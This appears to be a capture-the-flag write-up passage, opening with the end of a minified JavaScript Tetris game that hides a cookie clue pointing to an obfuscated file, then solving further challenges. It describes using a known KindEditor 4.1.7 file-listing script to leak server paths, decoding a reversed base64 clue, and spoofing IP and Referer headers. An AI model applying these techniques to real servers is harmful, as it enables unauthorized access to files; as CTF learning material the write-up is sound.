            if (c < this.y && a < this.x) return this.board[c][a];
            throw "Area.getBlock(" + c + ",\t" + a + ") failed";
        };
        this.addElement = function(c) {
            var a = parseInt(c.offsetLeft / this.unit),
                b = parseInt(c.offsetTop / this.unit);
            0 <= b && b < this.y && 0 <= a && a < this.x && (this.board[b][a] = c)
        }
    }
    function k(b, d) {
        var a = this;
        this.tetris = b;
        this.area = d;
        this.stopped = this.running = this.speed = this.position = this.nextType = this.type = this.forceMoveDownID = this.fallDownID = null;
        this.board = [];
        this.elements = [];
        this.nextElements = [];
        this.y = this.x = null;
        this.puzzles = [
            [
                [0, 0, 1],
                [1, 1, 1],
                [0, 0, 0]
            ],
            [
                [1, 0, 0],
                [1, 1, 1],
                [0, 0, 0]
            ],
            [
                [0, 1, 1],
                [1, 1, 0],
                [0, 0, 0]
            ],
            [
                [1, 1, 0],
                [0, 1, 1],
                [0, 0, 0]
            ],
            [
                [0, 1, 0],
                [1, 1, 1],
                [0, 0, 0]
            ],
            [
                [1, 1],
                [1, 1]
            ],
            [
                [0, 0, 0, 0],
                [1, 1, 1, 1],
                [0, 0, 0, 0],
                [0, 0, 0, 0]
            ]
        ];
        this.reset = function() {
            this.fallDownID && clearTimeout(this.fallDownID);
            this.forceMoveDownID && clearTimeout(this.forceMoveDownID);
            this.type = this.nextType;
            this.nextType = q(this.puzzles.length);
            this.position = 0;
            this.speed = 80 + 700 / this.tetris.stats.getLevel();
            this.stopped = this.running = !1;
            this.board = [];
            this.elements = [];
            for (var c = 0; c < this.nextElements.length; c++) document.getElementById("tetris-nextpuzzle").removeChild(this.nextElements[c]);
            this.nextElements = [];
            this.y = this.x = null
        };
        this.nextType = q(this.puzzles.length);
        this.reset();
        this.isRunning = function() {
            return this.running
        };
        this.isStopped = function() {
            return this.stopped
        };
        this.getX = function() {
            return this.x
        };
        this.getY = function() {
            return this.y
        };
        this.mayPlace = function() {
            for (var c = this.puzzles[this.type], a = parseInt((this.area.x - c[0].length) / 2), b = !1, d = 0, g = c.length - 1; 0 <= g; g--) {
                for (var h = 0; h < c[g].length; h++) if (c[g][h] && (b = !0, this.area.getBlock(1, a + h))) return !1;
                b && d++;
                if (0 > 1 - d) break
            }
            return !0
        };
        this.place = function() {
            this.tetris.stats.setPuzzles(this.tetris.stats.getPuzzles() + 1);
            this.tetris.stats.getPuzzles() >= 10 + 2 * this.tetris.stats.getLevel() && (this.tetris.stats.setLevel(this.tetris.stats.getLevel() + 1), this.tetris.stats.setPuzzles(0));
            var c = this.puzzles[this.type],
                a = parseInt((this.area.x - c[0].length) / 2),
                b = !1,
                g = 0;
            this.x = a;
            this.y = 1;
            this.board = this.createEmptyPuzzle(c.length, c[0].length);
            for (var d = c.length - 1; 0 <= d; d--) {
                for (var h = 0; h < c[d].length; h++) if (c[d][h]) {
                    var b = !0,
                        e = document.createElement("div");
                    e.className = "block" + this.type;
                    e.style.left = (a + h) * this.area.unit + "px";
                    e.style.top = (1 - g) * this.area.unit + "px";
                    this.area.el.appendChild(e);
                    this.board[d][h] = e;
                    this.elements.push(e)
                }
                g && this.y--;
                b && g++
            }
            this.running = !0;
            this.fallDownID = setTimeout(this.fallDown, this.speed);
            c = this.puzzles[this.nextType];
            for (d = 0; d < c.length; d++) for (h = 0; h < c[d].length; h++) c[d][h] && (e = document.createElement("div"), e.className = "block" + this.nextType, e.style.left = h * this.area.unit + "px", e.style.top = d * this.area.unit + "px", document.getElementById("tetris-nextpuzzle").appendChild(e), this.nextElements.push(e))
        };
        this.destroy = function() {
            for (var c = 0; c < this.elements.length; c++) this.area.el.removeChild(this.elements[c]);
            this.elements = [];
            this.board = [];
            this.reset()
        };
        this.createEmptyPuzzle = function(c, a) {
            for (var b = [], d = 0; d < c; d++) {
                b.push([]);
                for (var g = 0; g < a; g++) b[d].push(0)
            }
            return b
        };
        this.fallDown = function() {
            if (a.isRunning()) if (a.mayMoveDown()) a.moveDown(), a.fallDownID = setTimeout(a.fallDown, a.speed);
            else {
                for (var c = 0; c < a.elements.length; c++) a.area.addElement(a.elements[c]);
                if (c = a.area.removeFullLines()) a.tetris.stats.setLines(a.tetris.stats.getLines() + c), a.tetris.stats.setScore(a.tetris.stats.getScore() + 1E3 * a.tetris.stats.getLevel() * c);
                a.reset();
                a.mayPlace() ? a.place() : a.tetris.gameOver()
            }
        };
        this.forceMoveDown = function() {
            if (!a.isRunning() && !a.isStopped()) if (a.mayMoveDown()) a.tetris.stats.setScore(a.tetris.stats.getScore() + 5 + a.tetris.stats.getLevel()), a.tetris.stats.setActions(a.tetris.stats.getActions() + 1), a.moveDown(), a.forceMoveDownID = setTimeout(a.forceMoveDown, 30);
            else {
                for (var c = 0; c < a.elements.length; c++) a.area.addElement(a.elements[c]);
                if (c = a.area.removeFullLines()) a.tetris.stats.setLines(a.tetris.stats.getLines() + c), a.tetris.stats.setScore(a.tetris.stats.getScore() + 1E3 * a.tetris.stats.getLevel() * c);
                a.reset();
                a.mayPlace() ? a.place() : a.tetris.gameOver()
            }
        };
        this.stop = function() {
            this.running = !1
        };
        this.mayRotate = function() {
            for (var c = 0; c < this.board.length; c++) for (var a = 0; a < this.board[c].length; a++) if (this.board[c][a]) {
                var b = this.getY() + this.board.length - 1 - a,
                    d = this.getX() + c;
                if (b >= this.area.y || 0 > d || d >= this.area.x || this.area.getBlock(b, d)) return !1
            }
            return !0
        };
        this.rotate = function() {
            for (var c = this.createEmptyPuzzle(this.board.length, this.board[0].length), a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b]) {
                var d = c.length - 1 - b,
                    g = a,
                    e = this.board[a][b],
                    f = d - a;
                e.style.left = e.offsetLeft + (g - b) * this.area.unit + "px";
                e.style.top = e.offsetTop + f * this.area.unit + "px";
                c[d][g] = e
            }
            this.board = c
        };
        this.mayMoveDown = function() {
            for (var a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b] && (this.getY() + a + 1 >= this.area.y || this.area.getBlock(this.getY() + a + 1, this.getX() + b))) return this.stopped = !0, !1;
            return !0
        };
        this.moveDown = function() {
            for (var a = 0; a < this.elements.length; a++) this.elements[a].style.top = this.elements[a].offsetTop + this.area.unit + "px";
            this.y++
        };
        this.mayMoveLeft = function() {
            for (var a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b] && (0 > this.getX() + b - 1 || this.area.getBlock(this.getY() + a, this.getX() + b - 1))) return !1;
            return !0
        };
        this.moveLeft = function() {
            for (var a = 0; a < this.elements.length; a++) this.elements[a].style.left = this.elements[a].offsetLeft - this.area.unit + "px";
            this.x--
        };
        this.mayMoveRight = function() {
            for (var a = 0; a < this.board.length; a++) for (var b = 0; b < this.board[a].length; b++) if (this.board[a][b] && (this.getX() + b + 1 >= this.area.x || this.area.getBlock(this.getY() + a, this.getX() + b + 1))) return !1;
            return !0
        };
        this.moveRight = function() {
            for (var a = 0; a < this.elements.length; a++) this.elements[a].style.left = this.elements[a].offsetLeft + this.area.unit + "px";
            this.x++
        }
    }
    function q(b) {
        return Math.floor(Math.random() * b)
    }
    function p() {
        this.get = function(b) {
            for (var d = document.cookie.split(";"), a = 0; a < d.length; ++a) {
                var c = d[a].split("=");
                if (2 == c.length && (c[0] = c[0].trim(), c[1] = c[1].trim(), c[0] == b)) return unescape(c[1])
            }
            return ""
        };
        this.set = function(b, d, a, c, e, f) {
            this.del(b);
            c || (c = "/");
            b = b + "=" + escape(d);
            a && (a = new Date((new Date).getTime() + 1E3 * a), b += "; expires=" + a.toGMTString());
            b = b + (c ? ";\tpath=" + c : "") + (e ? ";\tdomain=" + e : "");
            b += f ? ";\tsecure" : "";
            document.cookie = b
        };
        this.del = function(b) {
            document.cookie = b + "=; expires=Thu, 01-Jan-70\t00:00:01 GMT"
        }
    }
    var b = this;
    this.stats = new function() {
        this.level;
        this.time;
        this.apm;
        this.lines;
        this.score;
        this.puzzles;
        this.actions;
        this.el = {
            level: document.getElementById("tetris-stats-level"),
            time: document.getElementById("tetris-stats-time"),
            apm: document.getElementById("tetris-stats-apm"),
            lines: document.getElementById("tetris-stats-lines"),
            score: document.getElementById("tetris-stats-score")
        };
        this.timerId = null;
        var b = this;
        this.start = function() {
            this.reset();
            this.timerId = setInterval(this.incTime, 1E3)
        };
        this.stop = function() {
            this.timerId && clearInterval(this.timerId)
        };
        this.reset = function() {
            this.stop();
            this.level = 1;
            this.actions = this.puzzles = this.score = this.lines = this.apm = this.time = 0;
            this.el.level.innerHTML = this.level;
            this.el.time.innerHTML = this.time;
            this.el.apm.innerHTML = this.apm;
            this.el.lines.innerHTML = this.lines;
            this.el.score.innerHTML = this.score
        };
        this.incTime = function() {
            b.time++;
            b.el.time.innerHTML = b.time;
            b.apm = parseInt(b.actions / b.time * 60);
            b.el.apm.innerHTML = b.apm
        };
        this.setScore = function(b) {
            this.score = b;
            this.el.score.innerHTML = this.score
        };
        this.setLevel = function(b) {
            this.level = b;
            this.el.level.innerHTML = this.level
        };
        this.setLines = function(b) {
            this.lines = b;
            this.el.lines.innerHTML = this.lines
        };
        this.setPuzzles = function(b) {
            this.puzzles = b
        };
        this.setActions = function(b) {
            this.actions = b
        };
        this.getScore = function() {
            return this.score
        };
        this.getLevel = function() {
            return this.level
        };
        this.getLines = function() {
            return this.lines
        };
        this.getPuzzles = function() {
            return this.puzzles
        };
        this.getActions = function() {
            return this.actions
        }
    };
    this.area = this.puzzle = null;
    this.areaY = this.areaX = this.unit = 20;
    this.highscores = new function(b) {
        function d(a, b) {
            this.name = a;
            this.score = b
        }
        this.maxscores = b;
        this.scores = [];
        this.load = function() {
            var a = (new p).get("tetris-highscores");
            this.scores = [];
            if (a.length) for (var a = a.split("|"), b = 0; b < a.length; ++b) {
                var e = a[b].split(":");
                this.scores.push(new d(e[0], Number(e[1])))
            }
        };
        this.save = function() {
            for (var a = new p, b = [], d = 0; d < this.scores.length; ++d) b.push(this.scores[d].name + ":" + this.scores[d].score);
            b = b.join("|");
            a.set("tetris-highscores", b, 864E5)
        };
        this.mayAdd = function(a) {
            if (this.scores.length < this.maxscores) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
            for (var b = this.scores.length - 1; 0 <= b; --b) if (this.scores[b].score < a) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
            return !1
        };
        this.add = function(a, b) {
            a = a.replace(/[;=:|]/g, "?");
            a = a.replace(/</g, "&lt;").replace(/>/g, "&gt;");
            if (this.scores.length < this.maxscores) this.scores.push(new d(a, b));
            else for (var e = this.scores.length - 1; 0 <= e; --e) if (this.scores[e].score < b) {
                this.scores.removeByIndex(e);
                this.scores.push(new d(a, b));
                break
            }
            this.sort();
            this.save()
        };
        this.getScores = function() {
            return this.scores
        };
        this.toHtml = function() {
            for (var a = '<table\tcellspacing="0"\tcellpadding="2"><tr><th></th><th>Name</th><th>Score</th></tr>', b = 0; b < this.scores.length; ++b) a += "<tr><td>?.</td><td>?</td><td>?</td></tr>".format(b + 1, this.scores[b].name, this.scores[b].score);
            return a + "</table>"
        };
        this.sort = function() {
            var a = this.scores,
                b = a.length;
            this.scores = [];
            for (var d = 0; d < b; ++d) {
                for (var e = null, g = null, f = 0; f < a.length; ++f) if (!e || a[f].score > e.score) e = a[f], g = f;
                a.removeByIndex(g);
                this.scores.push(e)
            }
        };
        this.load()
    }(10);
    this.start = function() {
        b.reset();
        b.stats.start();
        document.getElementById("tetris-nextpuzzle").style.display = "block";
        document.getElementById("tetris-keys").style.display = "none";
        b.area = new l(b.unit, b.areaX, b.areaY, "tetris-area");
        b.puzzle = new k(b, b.area);
        b.puzzle.mayPlace() ? b.puzzle.place() : b.gameOver()
    };
    this.reset = function() {
        b.puzzle && (b.puzzle.destroy(), b.puzzle = null);
        b.area && (b.area.destroy(), b.area = null);
        document.getElementById("tetris-gameover").style.display = "none";
        document.getElementById("tetris-nextpuzzle").style.display = "none";
        document.getElementById("tetris-keys").style.display = "block";
        b.stats.reset()
    };
    this.gameOver = function() {
        b.stats.stop();
        b.puzzle.stop();
        document.getElementById("tetris-nextpuzzle").style.display = "none";
        document.getElementById("tetris-gameover").style.display = "block";
        if (this.highscores.mayAdd(this.stats.getScore())) {
            var e = prompt("Game Over !\nEnter your name:", "");
            e && e.trim().length && this.highscores.add(e, this.stats.getScore())
        }
    };
    this.up = function() {
        b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayRotate() && (b.puzzle.rotate(), b.stats.setActions(b.stats.getActions() + 1))
    };
    this.down = function() {
        b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayMoveDown() && (b.stats.setScore(b.stats.getScore() + 5 + b.stats.getLevel()), b.puzzle.moveDown(), b.stats.setActions(b.stats.getActions() + 1))
    };
    this.left = function() {
        b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayMoveLeft() && (b.puzzle.moveLeft(), b.stats.setActions(b.stats.getActions() + 1))
    };
    this.right = function() {
        b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && b.puzzle.mayMoveRight() && (b.puzzle.moveRight(), b.stats.setActions(b.stats.getActions() + 1))
    };
    this.space = function() {
        b.puzzle && b.puzzle.isRunning() && !b.puzzle.isStopped() && (b.puzzle.stop(), b.puzzle.forceMoveDown())
    };
    var m = new f("tetris-help"),
        n = new f("tetris-highscores");
    document.getElementById("tetris-menu-start").onclick = function() {
        m.close();
        n.close();
        b.start();
        this.blur()
    };
    document.getElementById("tetris-menu-reset").onclick = function() {
        m.close();
        n.close();
        b.reset();
        this.blur()
    };
    document.getElementById("tetris-menu-help").onclick = function() {
        n.close();
        m.activate();
        this.blur()
    };
    document.getElementById("tetris-help-close").onclick = m.close;
    document.getElementById("tetris-menu-highscores").onclick = function() {
        m.close();
        document.getElementById("tetris-highscores-content").innerHTML = b.highscores.toHtml();
        n.activate();
        this.blur()
    };
    document.getElementById("tetris-highscores-close").onclick = n.close;
    var e = new function() {
            this.up = 38;
            this.down = 40;
            this.left = 37;
            this.right = 39;
            this.n = 78;
            this.r = 82;
            this.space = 32;
            this.f12 = 123;
            this.escape = 27;
            this.keys = [];
            this.funcs = [];
            var b = this;
            this.set = function(b, a) {
                this.keys.push(b);
                this.funcs.push(a)
            };
            this.event = function(d) {
                d || (d = window.event);
                for (var a = 0; a < b.keys.length; a++) if (d.keyCode == b.keys[a]) b.funcs[a]()
            }
        };
    e.set(e.n, this.start);
    e.set(e.r, this.reset);
    e.set(e.up, this.up);
    e.set(e.down, this.down);
    e.set(e.left, this.left);
    e.set(e.right, this.right);
    e.set(e.space, this.space);
    document.onkeydown = e.event
}
String.prototype.trim || (String.prototype.trim = function() {
    return this.replace(/^\s*|\s*$/g, "")
});
Array.prototype.removeByIndex || (Array.prototype.removeByIndex = function(f) {
    this.splice(f, 1)
});
String.prototype.format || (String.prototype.format = function() {
    if (!arguments.length) throw "String.format()\tfailed,\tno arguments passed, this =\t" + this;
    var f = this.split("?");
    if (arguments.length != f.length - 1) throw "String.format() failed, tokens !=\targuments, this\t= " + this;
    for (var l = f[0], k = 0; k < arguments.length; ++k) l += arguments[k] + f[k + 1];
    return l
});

The key code:

        this.mayAdd = function(a) {
            if (this.scores.length < this.maxscores) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
            for (var b = this.scores.length - 1; 0 <= b; --b) if (this.scores[b].score < a) return 1E6 < a && (a = new p, a.set("urlkey", "webqwer" [1] + "100.js", 864E5)), !0;
            return !1
        };

`"webqwer"[1] + "100.js"` evaluates to `e100.js`.
Requesting that file returns JavaScript obfuscated with JSFuck. Run it directly in the browser console.
flag{oT0yTrjU0xhjhj2YTcT8jljMWpzS9tDk}

Reappear

Approach

The information leaked by http://218.76.35.75:65180//kindeditor/kindeditor.js shows the version is 4.1.7.
This version ships a script that leaks file paths: /php/file_manager_json.php
Visit it directly.

Following the leaked listing, visit /attached/flag_clue.php,
which returns =0nYvpEdhVmcnFUZu9GRlZXd7pzZhxmZ
Reverse the string and base64-decode it to get the flag.
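The reverse-then-base64 step above, as an added example that is not part of the original writeup: a leading `=` is the tell, because base64 padding can only legally appear at the end, so a string that starts with padding has been reversed. The decoder checks for that before decoding and rejects anything that is not clean base64 afterwards.

```python
import base64
import binascii
import re

# Clue string returned by /attached/flag_clue.php, copied from the writeup above.
CLUE = "=0nYvpEdhVmcnFUZu9GRlZXd7pzZhxmZ"

# Standard base64 alphabet with at most two trailing '=' padding characters.
B64_ALPHABET = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


def looks_reversed_base64(s: str) -> bool:
    """True when the string starts with '=' and is valid base64 once reversed.

    Padding never appears at the front of genuine base64, so this shape
    almost always means the original text was reversed as light obfuscation.
    """
    return s.startswith("=") and B64_ALPHABET.match(s[::-1]) is not None


def decode_clue(s: str) -> str:
    """Undo the reverse-then-base64 obfuscation used by the challenge.

    Raises ValueError instead of returning garbage when the input is not
    base64 in either orientation or does not decode to UTF-8 text.
    """
    candidate = s[::-1] if looks_reversed_base64(s) else s
    if B64_ALPHABET.match(candidate) is None or len(candidate) % 4:
        raise ValueError("not valid base64 in either orientation: %r" % s)
    try:
        return base64.b64decode(candidate).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("decode failed for %r: %s" % (s, exc)) from exc


if __name__ == "__main__":
    print(decode_clue(CLUE))
```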

DrinkCoffee

Approach

Capture the request, modify the IP and Referer headers as the hints suggest, and look at the response: it contains d2626f412da748e711ca4f4ae9428664, an MD5 hash that reverses to cafe.
Put cafe into the request and resend it to get the flag.


Document

Approach

That's all for now; I'll continue writing at seven.
